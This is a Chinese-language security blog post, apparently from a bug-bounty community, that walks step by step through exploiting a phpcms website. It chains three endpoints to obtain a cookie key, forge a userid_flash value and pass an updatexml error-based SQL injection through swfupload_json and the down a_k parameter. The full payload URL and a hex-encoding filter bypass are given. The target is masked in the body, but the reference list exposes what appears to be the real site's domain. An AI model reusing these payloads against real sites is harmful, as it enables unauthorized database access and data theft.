某cms网站渗透的过程

  • A+
所属分类:安全文章

1.通过fofa查询出该网站的后台,进去发现很像某cms,利用御剑的cms识别工具识别出对方是phpcms的站。

某cms网站渗透的过程

2.通过百度查询得出:该phpcms站点可能存在文件上传,敏感信息泄露,sql报错注入。我只验证出来了sql报错注入。

3.把这几个链接转发到burp的重放器:

1.1:

http://xxxxxx.com.cn/index.php?m=wap&c=index&a=init&siteid=1[1]

获取Set-Cookie: aOqWU_siteid用的。

1.2:

http://xxxxxx.com.cn/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=[2]

sql报错注入转换为Set-Cookie:aOqWU_att_json用的。

1.3:

http://xxxxxx.com.cn/index.php?m=content&c=down&a_k=[3]

解密传输用的。

4.第一个1.1的链接发送go得到Set-Cookie: aOqWU_siteid的key。

某cms网站渗透的过程

5.把获取的的key复制到1.2链接最下面,伪造数据为:userid_flash=5608UgJVA1RVCARVBVdSVQRRVgwOAgFUWgMFBgYF,把GET请求改为POST请求。

某cms网站渗透的过程

某cms网站渗透的过程

6.构造url链接为sql报错注入链接:/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27%20and%20updatexml%281%2Cconcat%281%2C%28%28select database()%29%29%29%2C1%29%23%26m%3D1%26f%3Dhaha%26modelid%3D2%26catid%3D7%26&XDEBUG_SESSION_START=PHPSTORM

点击go,即可得到加密后的SQL了,其实sql语句可以不用url编码的只是一段复制下来的。

某cms网站渗透的过程

7.复制那段去1.3链接后面加上就可以解密执行sql语句了,a_k=aOqWU_att_json的key。

某cms网站渗透的过程

8.到后面的话因为过滤了'里面的内容'用16进制绕过就好。

参考链接:https://blog.csdn.net/Fly_hps/article/details/85222735?utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7Edefault-6.control&dist_request_id=&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7EBlogCommendFromBaidu%7Edefault-6.control

References

[1] http://xxxxxx.com.cn/index.php?m=wap&c=index&a=init&siteid=1: http://portal.teacherclub.com.cn/index.php?a=init&c=index&m=wap&siteid=1
[2] http://xxxxxx.com.cn/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=: http://portal.teacherclub.com.cn/index.php?a=swfupload_json&aid=1&c=attachments&m=attachment&src=%26id%3D
[3] http://xxxxxx.com.cn/index.php?m=content&c=down&a_k=: http://portal.teacherclub.com.cn/index.php?a_k=&c=down&m=content


- END -


【周度激励】2021.4.26 ~ 2021.5.2公告

某cms网站渗透的过程


【火线Zone】


火线Zone是[火线安全平台]运营的封闭式社区,社区成员必须在[火线安全平台]提交有效漏洞才能申请免费加入,符合要求的白帽子可联系[火小表妹]免费加入~

我们不希望出现劣币驱逐良币的结果,我们不希望一个技术社区变成一个水区!

欢迎具备分享精神的白帽子加入火线Zone,共建一个有技术氛围的优质社区!


某cms网站渗透的过程

某cms网站渗透的过程

关注我们 解锁更多挖洞姿势




本文始发于微信公众号(火线Zone):某cms网站渗透的过程

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: